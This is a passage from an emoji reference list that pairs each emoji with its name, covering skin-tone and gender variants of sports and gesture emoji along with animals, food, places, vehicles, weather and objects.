🚵🏾♀️ Woman Mountain Biking: Medium-Dark Skin Tone
🚵🏿♀️ Woman Mountain Biking: Dark Skin Tone
🏎 Racing Car
🏍 Motorcycle
🤸 Person Cartwheeling
🤸🏻 Person Cartwheeling: Light Skin Tone
🤸🏼 Person Cartwheeling: Medium-Light Skin Tone
🤸🏽 Person Cartwheeling: Medium Skin Tone
🤸🏾 Person Cartwheeling: Medium-Dark Skin Tone
🤸🏿 Person Cartwheeling: Dark Skin Tone
🤸♂️ Man Cartwheeling
🤸🏻♂️ Man Cartwheeling: Light Skin Tone
🤸🏼♂️ Man Cartwheeling: Medium-Light Skin Tone
🤸🏽♂️ Man Cartwheeling: Medium Skin Tone
🤸🏾♂️ Man Cartwheeling: Medium-Dark Skin Tone
🤸🏿♂️ Man Cartwheeling: Dark Skin Tone
🤸♀️ Woman Cartwheeling
🤸🏻♀️ Woman Cartwheeling: Light Skin Tone
🤸🏼♀️ Woman Cartwheeling: Medium-Light Skin Tone
🤸🏽♀️ Woman Cartwheeling: Medium Skin Tone
🤸🏾♀️ Woman Cartwheeling: Medium-Dark Skin Tone
🤸🏿♀️ Woman Cartwheeling: Dark Skin Tone
🤼 People Wrestling
🤼♂️ Men Wrestling
🤼♀️ Women Wrestling
🤽 Person Playing Water Polo
🤽🏻 Person Playing Water Polo: Light Skin Tone
🤽🏼 Person Playing Water Polo: Medium-Light Skin Tone
🤽🏽 Person Playing Water Polo: Medium Skin Tone
🤽🏾 Person Playing Water Polo: Medium-Dark Skin Tone
🤽🏿 Person Playing Water Polo: Dark Skin Tone
🤽♂️ Man Playing Water Polo
🤽🏻♂️ Man Playing Water Polo: Light Skin Tone
🤽🏼♂️ Man Playing Water Polo: Medium-Light Skin Tone
🤽🏽♂️ Man Playing Water Polo: Medium Skin Tone
🤽🏾♂️ Man Playing Water Polo: Medium-Dark Skin Tone
🤽🏿♂️ Man Playing Water Polo: Dark Skin Tone
🤽♀️ Woman Playing Water Polo
🤽🏻♀️ Woman Playing Water Polo: Light Skin Tone
🤽🏼♀️ Woman Playing Water Polo: Medium-Light Skin Tone
🤽🏽♀️ Woman Playing Water Polo: Medium Skin Tone
🤽🏾♀️ Woman Playing Water Polo: Medium-Dark Skin Tone
🤽🏿♀️ Woman Playing Water Polo: Dark Skin Tone
🤾 Person Playing Handball
🤾🏻 Person Playing Handball: Light Skin Tone
🤾🏼 Person Playing Handball: Medium-Light Skin Tone
🤾🏽 Person Playing Handball: Medium Skin Tone
🤾🏾 Person Playing Handball: Medium-Dark Skin Tone
🤾🏿 Person Playing Handball: Dark Skin Tone
🤾♂️ Man Playing Handball
🤾🏻♂️ Man Playing Handball: Light Skin Tone
🤾🏼♂️ Man Playing Handball: Medium-Light Skin Tone
🤾🏽♂️ Man Playing Handball: Medium Skin Tone
🤾🏾♂️ Man Playing Handball: Medium-Dark Skin Tone
🤾🏿♂️ Man Playing Handball: Dark Skin Tone
🤾♀️ Woman Playing Handball
🤾🏻♀️ Woman Playing Handball: Light Skin Tone
🤾🏼♀️ Woman Playing Handball: Medium-Light Skin Tone
🤾🏽♀️ Woman Playing Handball: Medium Skin Tone
🤾🏾♀️ Woman Playing Handball: Medium-Dark Skin Tone
🤾🏿♀️ Woman Playing Handball: Dark Skin Tone
🤹 Person Juggling
🤹🏻 Person Juggling: Light Skin Tone
🤹🏼 Person Juggling: Medium-Light Skin Tone
🤹🏽 Person Juggling: Medium Skin Tone
🤹🏾 Person Juggling: Medium-Dark Skin Tone
🤹🏿 Person Juggling: Dark Skin Tone
🤹♂️ Man Juggling
🤹🏻♂️ Man Juggling: Light Skin Tone
🤹🏼♂️ Man Juggling: Medium-Light Skin Tone
🤹🏽♂️ Man Juggling: Medium Skin Tone
🤹🏾♂️ Man Juggling: Medium-Dark Skin Tone
🤹🏿♂️ Man Juggling: Dark Skin Tone
🤹♀️ Woman Juggling
🤹🏻♀️ Woman Juggling: Light Skin Tone
🤹🏼♀️ Woman Juggling: Medium-Light Skin Tone
🤹🏽♀️ Woman Juggling: Medium Skin Tone
🤹🏾♀️ Woman Juggling: Medium-Dark Skin Tone
🤹🏿♀️ Woman Juggling: Dark Skin Tone
🤼🏻 Wrestlers, Type-1-2
🤼🏼 Wrestlers, Type-3
🤼🏽 Wrestlers, Type-4
🤼🏾 Wrestlers, Type-5
🤼🏿 Wrestlers, Type-6
🤼🏻♂️ Men Wrestling, Type-1-2
🤼🏼♂️ Men Wrestling, Type-3
🤼🏽♂️ Men Wrestling, Type-4
🤼🏾♂️ Men Wrestling, Type-5
🤼🏿♂️ Men Wrestling, Type-6
🤼🏻♀️ Women Wrestling, Type-1-2
🤼🏼♀️ Women Wrestling, Type-3
🤼🏽♀️ Women Wrestling, Type-4
🤼🏾♀️ Women Wrestling, Type-5
🤼🏿♀️ Women Wrestling, Type-6
👫 Man and Woman Holding Hands
👬 Two Men Holding Hands
👭 Two Women Holding Hands
💏 Kiss
👩❤️💋👨 Kiss: Woman, Man
👨❤️💋👨 Kiss: Man, Man
👩❤️💋👩 Kiss: Woman, Woman
💑 Couple With Heart
👩❤️👨 Couple With Heart: Woman, Man
👨❤️👨 Couple With Heart: Man, Man
👩❤️👩 Couple With Heart: Woman, Woman
👪 Family
👨👩👦 Family: Man, Woman, Boy
👨👩👧 Family: Man, Woman, Girl
👨👩👧👦 Family: Man, Woman, Girl, Boy
👨👩👦👦 Family: Man, Woman, Boy, Boy
👨👩👧👧 Family: Man, Woman, Girl, Girl
👨👨👦 Family: Man, Man, Boy
👨👨👧 Family: Man, Man, Girl
👨👨👧👦 Family: Man, Man, Girl, Boy
👨👨👦👦 Family: Man, Man, Boy, Boy
👨👨👧👧 Family: Man, Man, Girl, Girl
👩👩👦 Family: Woman, Woman, Boy
👩👩👧 Family: Woman, Woman, Girl
👩👩👧👦 Family: Woman, Woman, Girl, Boy
👩👩👦👦 Family: Woman, Woman, Boy, Boy
👩👩👧👧 Family: Woman, Woman, Girl, Girl
👨👦 Family: Man, Boy
👨👦👦 Family: Man, Boy, Boy
👨👧 Family: Man, Girl
👨👧👦 Family: Man, Girl, Boy
👨👧👧 Family: Man, Girl, Girl
👩👦 Family: Woman, Boy
👩👦👦 Family: Woman, Boy, Boy
👩👧 Family: Woman, Girl
👩👧👦 Family: Woman, Girl, Boy
👩👧👧 Family: Woman, Girl, Girl
🤳 Selfie
🤳🏻 Selfie: Light Skin Tone
🤳🏼 Selfie: Medium-Light Skin Tone
🤳🏽 Selfie: Medium Skin Tone
🤳🏾 Selfie: Medium-Dark Skin Tone
🤳🏿 Selfie: Dark Skin Tone
💪 Flexed Biceps
💪🏻 Flexed Biceps: Light Skin Tone
💪🏼 Flexed Biceps: Medium-Light Skin Tone
💪🏽 Flexed Biceps: Medium Skin Tone
💪🏾 Flexed Biceps: Medium-Dark Skin Tone
💪🏿 Flexed Biceps: Dark Skin Tone
👈 Backhand Index Pointing Left
👈🏻 Backhand Index Pointing Left: Light Skin Tone
👈🏼 Backhand Index Pointing Left: Medium-Light Skin Tone
👈🏽 Backhand Index Pointing Left: Medium Skin Tone
👈🏾 Backhand Index Pointing Left: Medium-Dark Skin Tone
👈🏿 Backhand Index Pointing Left: Dark Skin Tone
👉 Backhand Index Pointing Right
👉🏻 Backhand Index Pointing Right: Light Skin Tone
👉🏼 Backhand Index Pointing Right: Medium-Light Skin Tone
👉🏽 Backhand Index Pointing Right: Medium Skin Tone
👉🏾 Backhand Index Pointing Right: Medium-Dark Skin Tone
👉🏿 Backhand Index Pointing Right: Dark Skin Tone
☝ Index Pointing Up
☝🏻 Index Pointing Up: Light Skin Tone
☝🏼 Index Pointing Up: Medium-Light Skin Tone
☝🏽 Index Pointing Up: Medium Skin Tone
☝🏾 Index Pointing Up: Medium-Dark Skin Tone
☝🏿 Index Pointing Up: Dark Skin Tone
👆 Backhand Index Pointing Up
👆🏻 Backhand Index Pointing Up: Light Skin Tone
👆🏼 Backhand Index Pointing Up: Medium-Light Skin Tone
👆🏽 Backhand Index Pointing Up: Medium Skin Tone
👆🏾 Backhand Index Pointing Up: Medium-Dark Skin Tone
👆🏿 Backhand Index Pointing Up: Dark Skin Tone
🖕 Middle Finger
🖕🏻 Middle Finger: Light Skin Tone
🖕🏼 Middle Finger: Medium-Light Skin Tone
🖕🏽 Middle Finger: Medium Skin Tone
🖕🏾 Middle Finger: Medium-Dark Skin Tone
🖕🏿 Middle Finger: Dark Skin Tone
👇 Backhand Index Pointing Down
👇🏻 Backhand Index Pointing Down: Light Skin Tone
👇🏼 Backhand Index Pointing Down: Medium-Light Skin Tone
👇🏽 Backhand Index Pointing Down: Medium Skin Tone
👇🏾 Backhand Index Pointing Down: Medium-Dark Skin Tone
👇🏿 Backhand Index Pointing Down: Dark Skin Tone
✌ Victory Hand
✌🏻 Victory Hand: Light Skin Tone
✌🏼 Victory Hand: Medium-Light Skin Tone
✌🏽 Victory Hand: Medium Skin Tone
✌🏾 Victory Hand: Medium-Dark Skin Tone
✌🏿 Victory Hand: Dark Skin Tone
🤞 Crossed Fingers
🤞🏻 Crossed Fingers: Light Skin Tone
🤞🏼 Crossed Fingers: Medium-Light Skin Tone
🤞🏽 Crossed Fingers: Medium Skin Tone
🤞🏾 Crossed Fingers: Medium-Dark Skin Tone
🤞🏿 Crossed Fingers: Dark Skin Tone
🖖 Vulcan Salute
🖖🏻 Vulcan Salute: Light Skin Tone
🖖🏼 Vulcan Salute: Medium-Light Skin Tone
🖖🏽 Vulcan Salute: Medium Skin Tone
🖖🏾 Vulcan Salute: Medium-Dark Skin Tone
🖖🏿 Vulcan Salute: Dark Skin Tone
🤘 Sign of the Horns
🤘🏻 Sign of the Horns: Light Skin Tone
🤘🏼 Sign of the Horns: Medium-Light Skin Tone
🤘🏽 Sign of the Horns: Medium Skin Tone
🤘🏾 Sign of the Horns: Medium-Dark Skin Tone
🤘🏿 Sign of the Horns: Dark Skin Tone
🤙 Call Me Hand
🤙🏻 Call Me Hand: Light Skin Tone
🤙🏼 Call Me Hand: Medium-Light Skin Tone
🤙🏽 Call Me Hand: Medium Skin Tone
🤙🏾 Call Me Hand: Medium-Dark Skin Tone
🤙🏿 Call Me Hand: Dark Skin Tone
🖐 Raised Hand With Fingers Splayed
🖐🏻 Raised Hand With Fingers Splayed: Light Skin Tone
🖐🏼 Raised Hand With Fingers Splayed: Medium-Light Skin Tone
🖐🏽 Raised Hand With Fingers Splayed: Medium Skin Tone
🖐🏾 Raised Hand With Fingers Splayed: Medium-Dark Skin Tone
🖐🏿 Raised Hand With Fingers Splayed: Dark Skin Tone
✋ Raised Hand
✋🏻 Raised Hand: Light Skin Tone
✋🏼 Raised Hand: Medium-Light Skin Tone
✋🏽 Raised Hand: Medium Skin Tone
✋🏾 Raised Hand: Medium-Dark Skin Tone
✋🏿 Raised Hand: Dark Skin Tone
👌 OK Hand
👌🏻 OK Hand: Light Skin Tone
👌🏼 OK Hand: Medium-Light Skin Tone
👌🏽 OK Hand: Medium Skin Tone
👌🏾 OK Hand: Medium-Dark Skin Tone
👌🏿 OK Hand: Dark Skin Tone
👍 Thumbs Up
👍🏻 Thumbs Up: Light Skin Tone
👍🏼 Thumbs Up: Medium-Light Skin Tone
👍🏽 Thumbs Up: Medium Skin Tone
👍🏾 Thumbs Up: Medium-Dark Skin Tone
👍🏿 Thumbs Up: Dark Skin Tone
👎 Thumbs Down
👎🏻 Thumbs Down: Light Skin Tone
👎🏼 Thumbs Down: Medium-Light Skin Tone
👎🏽 Thumbs Down: Medium Skin Tone
👎🏾 Thumbs Down: Medium-Dark Skin Tone
👎🏿 Thumbs Down: Dark Skin Tone
✊ Raised Fist
✊🏻 Raised Fist: Light Skin Tone
✊🏼 Raised Fist: Medium-Light Skin Tone
✊🏽 Raised Fist: Medium Skin Tone
✊🏾 Raised Fist: Medium-Dark Skin Tone
✊🏿 Raised Fist: Dark Skin Tone
👊 Oncoming Fist
👊🏻 Oncoming Fist: Light Skin Tone
👊🏼 Oncoming Fist: Medium-Light Skin Tone
👊🏽 Oncoming Fist: Medium Skin Tone
👊🏾 Oncoming Fist: Medium-Dark Skin Tone
👊🏿 Oncoming Fist: Dark Skin Tone
🤛 Left-Facing Fist
🤛🏻 Left-Facing Fist: Light Skin Tone
🤛🏼 Left-Facing Fist: Medium-Light Skin Tone
🤛🏽 Left-Facing Fist: Medium Skin Tone
🤛🏾 Left-Facing Fist: Medium-Dark Skin Tone
🤛🏿 Left-Facing Fist: Dark Skin Tone
🤜 Right-Facing Fist
🤜🏻 Right-Facing Fist: Light Skin Tone
🤜🏼 Right-Facing Fist: Medium-Light Skin Tone
🤜🏽 Right-Facing Fist: Medium Skin Tone
🤜🏾 Right-Facing Fist: Medium-Dark Skin Tone
🤜🏿 Right-Facing Fist: Dark Skin Tone
🤚 Raised Back of Hand
🤚🏻 Raised Back of Hand: Light Skin Tone
🤚🏼 Raised Back of Hand: Medium-Light Skin Tone
🤚🏽 Raised Back of Hand: Medium Skin Tone
🤚🏾 Raised Back of Hand: Medium-Dark Skin Tone
🤚🏿 Raised Back of Hand: Dark Skin Tone
👋 Waving Hand
👋🏻 Waving Hand: Light Skin Tone
👋🏼 Waving Hand: Medium-Light Skin Tone
👋🏽 Waving Hand: Medium Skin Tone
👋🏾 Waving Hand: Medium-Dark Skin Tone
👋🏿 Waving Hand: Dark Skin Tone
🤟 Love-You Gesture
🤟🏻 Love-You Gesture: Light Skin Tone
🤟🏼 Love-You Gesture: Medium-Light Skin Tone
🤟🏽 Love-You Gesture: Medium Skin Tone
🤟🏾 Love-You Gesture: Medium-Dark Skin Tone
🤟🏿 Love-You Gesture: Dark Skin Tone
✍ Writing Hand
✍🏻 Writing Hand: Light Skin Tone
✍🏼 Writing Hand: Medium-Light Skin Tone
✍🏽 Writing Hand: Medium Skin Tone
✍🏾 Writing Hand: Medium-Dark Skin Tone
✍🏿 Writing Hand: Dark Skin Tone
👏 Clapping Hands
👏🏻 Clapping Hands: Light Skin Tone
👏🏼 Clapping Hands: Medium-Light Skin Tone
👏🏽 Clapping Hands: Medium Skin Tone
👏🏾 Clapping Hands: Medium-Dark Skin Tone
👏🏿 Clapping Hands: Dark Skin Tone
👐 Open Hands
👐🏻 Open Hands: Light Skin Tone
👐🏼 Open Hands: Medium-Light Skin Tone
👐🏽 Open Hands: Medium Skin Tone
👐🏾 Open Hands: Medium-Dark Skin Tone
👐🏿 Open Hands: Dark Skin Tone
🙌 Raising Hands
🙌🏻 Raising Hands: Light Skin Tone
🙌🏼 Raising Hands: Medium-Light Skin Tone
🙌🏽 Raising Hands: Medium Skin Tone
🙌🏾 Raising Hands: Medium-Dark Skin Tone
🙌🏿 Raising Hands: Dark Skin Tone
🤲 Palms Up Together
🤲🏻 Palms Up Together: Light Skin Tone
🤲🏼 Palms Up Together: Medium-Light Skin Tone
🤲🏽 Palms Up Together: Medium Skin Tone
🤲🏾 Palms Up Together: Medium-Dark Skin Tone
🤲🏿 Palms Up Together: Dark Skin Tone
🙏 Folded Hands
🙏🏻 Folded Hands: Light Skin Tone
🙏🏼 Folded Hands: Medium-Light Skin Tone
🙏🏽 Folded Hands: Medium Skin Tone
🙏🏾 Folded Hands: Medium-Dark Skin Tone
🙏🏿 Folded Hands: Dark Skin Tone
🤝 Handshake
💅 Nail Polish
💅🏻 Nail Polish: Light Skin Tone
💅🏼 Nail Polish: Medium-Light Skin Tone
💅🏽 Nail Polish: Medium Skin Tone
💅🏾 Nail Polish: Medium-Dark Skin Tone
💅🏿 Nail Polish: Dark Skin Tone
👂 Ear
👂🏻 Ear: Light Skin Tone
👂🏼 Ear: Medium-Light Skin Tone
👂🏽 Ear: Medium Skin Tone
👂🏾 Ear: Medium-Dark Skin Tone
👂🏿 Ear: Dark Skin Tone
👃 Nose
👃🏻 Nose: Light Skin Tone
👃🏼 Nose: Medium-Light Skin Tone
👃🏽 Nose: Medium Skin Tone
👃🏾 Nose: Medium-Dark Skin Tone
👃🏿 Nose: Dark Skin Tone
👣 Footprints
👀 Eyes
👁 Eye
👁️🗨️ Eye in Speech Bubble
🧠 Brain
👅 Tongue
👄 Mouth
💋 Kiss Mark
💘 Heart With Arrow
❤ Red Heart
💓 Beating Heart
💔 Broken Heart
💕 Two Hearts
💖 Sparkling Heart
💗 Growing Heart
💙 Blue Heart
💚 Green Heart
💛 Yellow Heart
🧡 Orange Heart
💜 Purple Heart
🖤 Black Heart
💝 Heart With Ribbon
💞 Revolving Hearts
💟 Heart Decoration
❣ Heavy Heart Exclamation
💌 Love Letter
💤 Zzz
💢 Anger Symbol
💣 Bomb
💥 Collision
💦 Sweat Droplets
💨 Dashing Away
💫 Dizzy
💬 Speech Balloon
🗨 Left Speech Bubble
🗯 Right Anger Bubble
💭 Thought Balloon
🕳 Hole
👓 Glasses
🕶 Sunglasses
👔 Necktie
👕 T-Shirt
👖 Jeans
🧣 Scarf
🧤 Gloves
🧥 Coat
🧦 Socks
👗 Dress
👘 Kimono
👙 Bikini
👚 Woman’s Clothes
👛 Purse
👜 Handbag
👝 Clutch Bag
🛍 Shopping Bags
🎒 School Backpack
👞 Man’s Shoe
👟 Running Shoe
👠 High-Heeled Shoe
👡 Woman’s Sandal
👢 Woman’s Boot
👑 Crown
👒 Woman’s Hat
🎩 Top Hat
🎓 Graduation Cap
🧢 Billed Cap
⛑ Rescue Worker’s Helmet
📿 Prayer Beads
💄 Lipstick
💍 Ring
💎 Gem Stone
🐵 Monkey Face
🐒 Monkey
🦍 Gorilla
🐶 Dog Face
🐕 Dog
🐩 Poodle
🐺 Wolf Face
🦊 Fox Face
🐱 Cat Face
🐈 Cat
🦁 Lion Face
🐯 Tiger Face
🐅 Tiger
🐆 Leopard
🐴 Horse Face
🐎 Horse
🦄 Unicorn Face
🦓 Zebra
🦌 Deer
🐮 Cow Face
🐂 Ox
🐃 Water Buffalo
🐄 Cow
🐷 Pig Face
🐖 Pig
🐗 Boar
🐽 Pig Nose
🐏 Ram
🐑 Ewe
🐐 Goat
🐪 Camel
🐫 Two-Hump Camel
🦒 Giraffe
🐘 Elephant
🦏 Rhinoceros
🐭 Mouse Face
🐁 Mouse
🐀 Rat
🐹 Hamster Face
🐰 Rabbit Face
🐇 Rabbit
🐿 Chipmunk
🦔 Hedgehog
🦇 Bat
🐻 Bear Face
🐨 Koala
🐼 Panda Face
🐾 Paw Prints
🦃 Turkey
🐔 Chicken
🐓 Rooster
🐣 Hatching Chick
🐤 Baby Chick
🐥 Front-Facing Baby Chick
🐦 Bird
🐧 Penguin
🕊 Dove
🦅 Eagle
🦆 Duck
🦉 Owl
🐸 Frog Face
🐊 Crocodile
🐢 Turtle
🦎 Lizard
🐍 Snake
🐲 Dragon Face
🐉 Dragon
🦕 Sauropod
🦖 T-Rex
🐳 Spouting Whale
🐋 Whale
🐬 Dolphin
🐟 Fish
🐠 Tropical Fish
🐡 Blowfish
🦈 Shark
🐙 Octopus
🐚 Spiral Shell
🦀 Crab
🦐 Shrimp
🦑 Squid
🐌 Snail
🦋 Butterfly
🐛 Bug
🐜 Ant
🐝 Honeybee
🐞 Lady Beetle
🦗 Cricket
🕷 Spider
🕸 Spider Web
🦂 Scorpion
💐 Bouquet
🌸 Cherry Blossom
💮 White Flower
🏵 Rosette
🌹 Rose
🥀 Wilted Flower
🌺 Hibiscus
🌻 Sunflower
🌼 Blossom
🌷 Tulip
🌱 Seedling
🌲 Evergreen Tree
🌳 Deciduous Tree
🌴 Palm Tree
🌵 Cactus
🌾 Sheaf of Rice
🌿 Herb
☘ Shamrock
🍀 Four Leaf Clover
🍁 Maple Leaf
🍂 Fallen Leaf
🍃 Leaf Fluttering in Wind
🍇 Grapes
🍈 Melon
🍉 Watermelon
🍊 Tangerine
🍋 Lemon
🍌 Banana
🍍 Pineapple
🍎 Red Apple
🍏 Green Apple
🍐 Pear
🍑 Peach
🍒 Cherries
🍓 Strawberry
🥝 Kiwi Fruit
🍅 Tomato
🥥 Coconut
🥑 Avocado
🍆 Eggplant
🥔 Potato
🥕 Carrot
🌽 Ear of Corn
🌶 Hot Pepper
🥒 Cucumber
🥦 Broccoli
🍄 Mushroom
🥜 Peanuts
🌰 Chestnut
🍞 Bread
🥐 Croissant
🥖 Baguette Bread
🥨 Pretzel
🥞 Pancakes
🧀 Cheese Wedge
🍖 Meat on Bone
🍗 Poultry Leg
🥩 Cut of Meat
🥓 Bacon
🍔 Hamburger
🍟 French Fries
🍕 Pizza
🌭 Hot Dog
🥪 Sandwich
🌮 Taco
🌯 Burrito
🥙 Stuffed Flatbread
🥚 Egg
🍳 Cooking
🥘 Shallow Pan of Food
🍲 Pot of Food
🥣 Bowl With Spoon
🥗 Green Salad
🍿 Popcorn
🥫 Canned Food
🍱 Bento Box
🍘 Rice Cracker
🍙 Rice Ball
🍚 Cooked Rice
🍛 Curry Rice
🍜 Steaming Bowl
🍝 Spaghetti
🍠 Roasted Sweet Potato
🍢 Oden
🍣 Sushi
🍤 Fried Shrimp
🍥 Fish Cake With Swirl
🍡 Dango
🥟 Dumpling
🥠 Fortune Cookie
🥡 Takeout Box
🍦 Soft Ice Cream
🍧 Shaved Ice
🍨 Ice Cream
🍩 Doughnut
🍪 Cookie
🎂 Birthday Cake
🍰 Shortcake
🥧 Pie
🍫 Chocolate Bar
🍬 Candy
🍭 Lollipop
🍮 Custard
🍯 Honey Pot
🍼 Baby Bottle
🥛 Glass of Milk
☕ Hot Beverage
🍵 Teacup Without Handle
🍶 Sake
🍾 Bottle With Popping Cork
🍷 Wine Glass
🍸 Cocktail Glass
🍹 Tropical Drink
🍺 Beer Mug
🍻 Clinking Beer Mugs
🥂 Clinking Glasses
🥃 Tumbler Glass
🥤 Cup With Straw
🥢 Chopsticks
🍽 Fork and Knife With Plate
🍴 Fork and Knife
🥄 Spoon
🔪 Kitchen Knife
🏺 Amphora
🌍 Globe Showing Europe-Africa
🌎 Globe Showing Americas
🌏 Globe Showing Asia-Australia
🌐 Globe With Meridians
🗺 World Map
🗾 Map of Japan
🏔 Snow-Capped Mountain
⛰ Mountain
🌋 Volcano
🗻 Mount Fuji
🏕 Camping
🏖 Beach With Umbrella
🏜 Desert
🏝 Desert Island
🏞 National Park
🏟 Stadium
🏛 Classical Building
🏗 Building Construction
🏘 House
🏙 Cityscape
🏚 Derelict House
🏠 House
🏡 House With Garden
🏢 Office Building
🏣 Japanese Post Office
🏤 Post Office
🏥 Hospital
🏦 Bank
🏨 Hotel
🏩 Love Hotel
🏪 Convenience Store
🏫 School
🏬 Department Store
🏭 Factory
🏯 Japanese Castle
🏰 Castle
💒 Wedding
🗼 Tokyo Tower
🗽 Statue of Liberty
⛪ Church
🕌 Mosque
🕍 Synagogue
⛩ Shinto Shrine
🕋 Kaaba
⛲ Fountain
⛺ Tent
🌁 Foggy
🌃 Night With Stars
🌄 Sunrise Over Mountains
🌅 Sunrise
🌆 Cityscape at Dusk
🌇 Sunset
🌉 Bridge at Night
♨ Hot Springs
🌌 Milky Way
🎠 Carousel Horse
🎡 Ferris Wheel
🎢 Roller Coaster
💈 Barber Pole
🎪 Circus Tent
🎭 Performing Arts
🖼 Framed Picture
🎨 Artist Palette
🎰 Slot Machine
🚂 Locomotive
🚃 Railway Car
🚄 High-Speed Train
🚅 High-Speed Train With Bullet Nose
🚆 Train
🚇 Metro
🚈 Light Rail
🚉 Station
🚊 Tram
🚝 Monorail
🚞 Mountain Railway
🚋 Tram Car
🚌 Bus
🚍 Oncoming Bus
🚎 Trolleybus
🚐 Minibus
🚑 Ambulance
🚒 Fire Engine
🚓 Police Car
🚔 Oncoming Police Car
🚕 Taxi
🚖 Oncoming Taxi
🚗 Automobile
🚘 Oncoming Automobile
🚙 Sport Utility Vehicle
🚚 Delivery Truck
🚛 Articulated Lorry
🚜 Tractor
🚲 Bicycle
🛴 Kick Scooter
🛵 Motor Scooter
🚏 Bus Stop
🛣 Motorway
🛤 Railway Track
⛽ Fuel Pump
🚨 Police Car Light
🚥 Horizontal Traffic Light
🚦 Vertical Traffic Light
🚧 Construction
🛑 Stop Sign
⚓ Anchor
⛵ Sailboat
🛶 Canoe
🚤 Speedboat
🛳 Passenger Ship
⛴ Ferry
🛥 Motor Boat
🚢 Ship
✈ Airplane
🛩 Small Airplane
🛫 Airplane Departure
🛬 Airplane Arrival
💺 Seat
🚁 Helicopter
🚟 Suspension Railway
🚠 Mountain Cableway
🚡 Aerial Tramway
🛰 Satellite
🚀 Rocket
🛸 Flying Saucer
🛎 Bellhop Bell
🚪 Door
🛏 Bed
🛋 Couch and Lamp
🚽 Toilet
🚿 Shower
🛁 Bathtub
⌛ Hourglass
⏳ Hourglass With Flowing Sand
⌚ Watch
⏰ Alarm Clock
⏱ Stopwatch
⏲ Timer Clock
🕰 Mantelpiece Clock
🕛 Twelve O’clock
🕧 Twelve-Thirty
🕐 One O’clock
🕜 One-Thirty
🕑 Two O’clock
🕝 Two-Thirty
🕒 Three O’clock
🕞 Three-Thirty
🕓 Four O’clock
🕟 Four-Thirty
🕔 Five O’clock
🕠 Five-Thirty
🕕 Six O’clock
🕡 Six-Thirty
🕖 Seven O’clock
🕢 Seven-Thirty
🕗 Eight O’clock
🕣 Eight-Thirty
🕘 Nine O’clock
🕤 Nine-Thirty
🕙 Ten O’clock
🕥 Ten-Thirty
🕚 Eleven O’clock
🕦 Eleven-Thirty
🌑 New Moon
🌒 Waxing Crescent Moon
🌓 First Quarter Moon
🌔 Waxing Gibbous Moon
🌕 Full Moon
🌖 Waning Gibbous Moon
🌗 Last Quarter Moon
🌘 Waning Crescent Moon
🌙 Crescent Moon
🌚 New Moon Face
🌛 First Quarter Moon With Face
🌜 Last Quarter Moon With Face
🌡 Thermometer
☀ Sun
🌝 Full Moon With Face
🌞 Sun With Face
⭐ White Medium Star
🌟 Glowing Star
🌠 Shooting Star
☁ Cloud
⛅ Sun Behind Cloud
⛈ Cloud With Lightning and Rain
🌤 Sun Behind Small Cloud
🌥 Sun Behind Large Cloud
🌦 Sun Behind Rain Cloud
🌧 Cloud With Rain
🌨 Cloud With Snow
🌩 Cloud With Lightning
🌪 Tornado
🌫 Fog
🌬 Wind Face
🌀 Cyclone
🌈 Rainbow
🌂 Closed Umbrella
☂ Umbrella
☔ Umbrella With Rain Drops
⛱ Umbrella on Ground
⚡ High Voltage
❄ Snowflake
☃ Snowman
⛄ Snowman Without Snow
☄ Comet
🔥 Fire
💧 Droplet
🌊 Water Wave
🎃 Jack-O-Lantern
🎄 Christmas Tree
🎆 Fireworks
🎇 Sparkler
✨ Sparkles
🎈 Balloon
🎉 Party Popper
🎊 Confetti Ball
🎋 Tanabata Tree
🎍 Pine Decoration
🎎 Japanese Dolls
🎏 Carp Streamer
🎐 Wind Chime
🎑 Moon Viewing Ceremony
🎀 Ribbon
🎁 Wrapped Gift
🎗 Reminder Ribbon
🎟 Admission Tickets
🎫 Ticket
🎖 Military Medal
🏆 Trophy
🏅 Sports Medal
🥇 1st Place Medal
🥈 2nd Place Medal
🥉 3rd Place Medal
⚽ Soccer Ball
⚾ Baseball
🏀 Basketball
🏐 Volleyball
🏈 American Football
🏉 Rugby Football
🎾 Tennis
🎱 Pool 8 Ball
🎳 Bowling
🏏 Cricket
🏑 Field Hockey
🏒 Ice Hockey
🏓 Ping Pong
🏸 Badminton
🥊 Boxing Glove
🥋 Martial Arts Uniform
🥅 Goal Net
🎯 Direct Hit
⛳ Flag in Hole
⛸ Ice Skate
🎣 Fishing Pole
🎽 Running Shirt
🎿 Skis
🛷 Sled
🥌 Curling Stone
🎮 Video Game
🕹 Joystick
🎲 Game Die
♠ Spade Suit
♥ Heart Suit
♦ Diamond Suit
♣ Club Suit
🃏 Joker
🀄 Mahjong Red Dragon
🎴 Flower Playing Cards
🔇 Muted Speaker
🔈 Speaker Low Volume
🔉 Speaker Medium Volume
🔊 Speaker High Volume
📢 Loudspeaker
📣 Megaphone
📯 Postal Horn
🔔 Bell
🔕 Bell With Slash
🎼 Musical Score
🎵 Musical Note
🎶 Musical Notes
🎙 Studio Microphone
🎚 Level Slider
🎛 Control Knobs
🎤 Microphone
🎧 Headphone
📻 Radio
🎷 Saxophone
🎸 Guitar
🎹 Musical Keyboard
🎺 Trumpet
🎻 Violin
🥁 Drum
📱 Mobile Phone
📲 Mobile Phone With Arrow
☎ Telephone
📞 Telephone Receiver
📟 Pager
📠 Fax Machine
🔋 Battery
🔌 Electric Plug
💻 Laptop Computer
🖥 Desktop Computer
🖨 Printer
⌨ Keyboard
🖱 Computer Mouse
🖲 Trackball
💽 Computer Disk
💾 Floppy Disk
💿 Optical Disk
📀 DVD
🎥 Movie Camera
🎞 Film Frames
📽 Film Projector
🎬 Clapper Board
📺 Television
📷 Camera
📸 Camera With Flash
📹 Video Camera
📼 Videocassette
🔍 Left-Pointing Magnifying Glass
🔎 Right-Pointing Magnifying Glass
🔬 Microscope
🔭 Telescope
📡 Satellite Antenna
🕯 Candle
💡 Light Bulb
🔦 Flashlight
🏮 Red Paper Lantern
📔 Notebook With Decorative Cover
📕 Closed Book
📖 Open Book
📗 Green Book
📘 Blue Book
📙 Orange Book
📚 Books
📓 Notebook
📒 Ledger
📃 Page With Curl
📜 Scroll
📄 Page Facing Up
📰 Newspaper
🗞 Rolled-Up Newspaper
📑 Bookmark Tabs
🔖 Bookmark
🏷 Label
💰 Money Bag
💴 Yen Banknote
💵 Dollar Banknote
💶 Euro Banknote
💷 Pound Banknote
💸 Money With Wings
💳 Credit Card
💹 Chart Increasing With Yen
💱 Currency Exchange
💲 Heavy Dollar Sign
✉ Envelope
📧 E-Mail
📨 Incoming Envelope
📩 Envelope With Arrow
📤 Outbox Tray
📥 Inbox Tray
📦 Package
📫 Closed Mailbox With Raised Flag
📪 Closed Mailbox With Lowered Flag
📬 Open Mailbox With Raised Flag
